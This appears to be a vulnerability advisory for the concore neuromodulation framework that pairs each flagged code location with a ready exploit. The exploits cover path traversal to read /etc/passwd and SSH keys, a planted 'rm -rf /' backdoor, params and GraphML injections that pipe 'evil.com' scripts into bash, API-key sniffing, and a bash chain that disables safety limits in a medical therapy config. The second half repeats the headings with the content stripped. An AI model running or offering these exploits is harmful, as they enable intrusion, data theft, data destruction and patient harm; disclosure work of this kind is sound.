EXECUTIVE SUMMARY
The CONTROL-CORE (concore) neuromodulation framework contains multiple critical vulnerabilities enabling remote code execution, arbitrary file access, and medical device compromise. These flaws affect all implementations and pose immediate patient safety risks.
Location: concore/concore.py:223,290,293
# VULNERABLE CODE
file_path = os.path.join(inpath+str(file_port_num), name)
file_path = os.path.join("../"+port_identifier, name)Exploit:
concore.read(1, "../../../etc/passwd", "")
concore.write(1, "../../../tmp/backdoor.py", "import os;os.system('rm -rf /')")Location: concore/concore.py:149,256,323
# VULNERABLE CODE
params = literal_eval(sparams)
inval = literal_eval(ins)
Exploit:
# Create malicious concore.params
echo "__import__('os').system('curl evil.com/shell|bash')" > ./in1/concore.paramsLocation: concore/mkconcore.py:615-680
# VULNERABLE CODE
fbuild.write("mkdir docker-"+dockername+"\n")
fbuild.write("cp ../src/"+sourcecode+" .\n")Exploit:
<!-- Malicious GraphML -->
<node id="n1"><data key="d0">evil; rm -rf /; echo pwned:</data></node>
Location: concore/tools/pwrap.py:13,85
# VULNERABLE CODE
apikey=open(concore.inpath+'1/concore.apikey').readline()
r = requests.post('http://www.controlcore.org/ctl/'+apikey, files=f)
print(apikey) # Logged in plaintextLocation: concore/concore.py:38,75
# VULNERABLE CODE - No encryption
self.socket.bind("tcp://*:5555") # Binds to all interfaces
# All ZeroMQ traffic in plaintextLocation: concore/concore.hpp:136,355
// VULNERABLE CODE
shmId_create = shmget(key, 256, IPC_CREAT | 0666); // World-writable
std::string message(sharedData_get, strnlen(sharedData_get, 256)); // No bounds check
Complete System Compromise Chain
#!/bin/bash
# 1. Path traversal to read SSH keys
python3 -c "import concore; print(concore.read(1, '../../../root/.ssh/id_rsa', ''))"
# 2. Code injection via params file
echo "__import__('subprocess').call(['wget','http://evil.com/backdoor.py','-O','/tmp/b.py'])" > ./in1/concore.params
# 3. Command injection via GraphML
cat > malicious.graphml << EOF
<graphml><node id="n1"><data key="d0">test; curl evil.com/shell.sh|bash; echo normal</data></node></graphml>
EOF
# 4. API key theft via network interception
tcpdump -i any host controlcore.org -A | grep -E "(apikey|authorization)"
# 5. Medical device parameter manipulation
python3 -c "import concore; concore.write(1, '../../../etc/medical/therapy.conf', 'amplitude=999999\nsafety_disabled=true')"REFERENCES
EXECUTIVE SUMMARY
The CONTROL-CORE (concore) neuromodulation framework contains multiple critical vulnerabilities enabling remote code execution, arbitrary file access, and medical device compromise. These flaws affect all implementations and pose immediate patient safety risks.
Location:
concore/concore.py:223,290,293Exploit:
Location:
concore/concore.py:149,256,323Exploit:
Location:
concore/mkconcore.py:615-680Exploit:
Location:
concore/tools/pwrap.py:13,85Location:
concore/concore.py:38,75Location:
concore/concore.hpp:136,355Complete System Compromise Chain
REFERENCES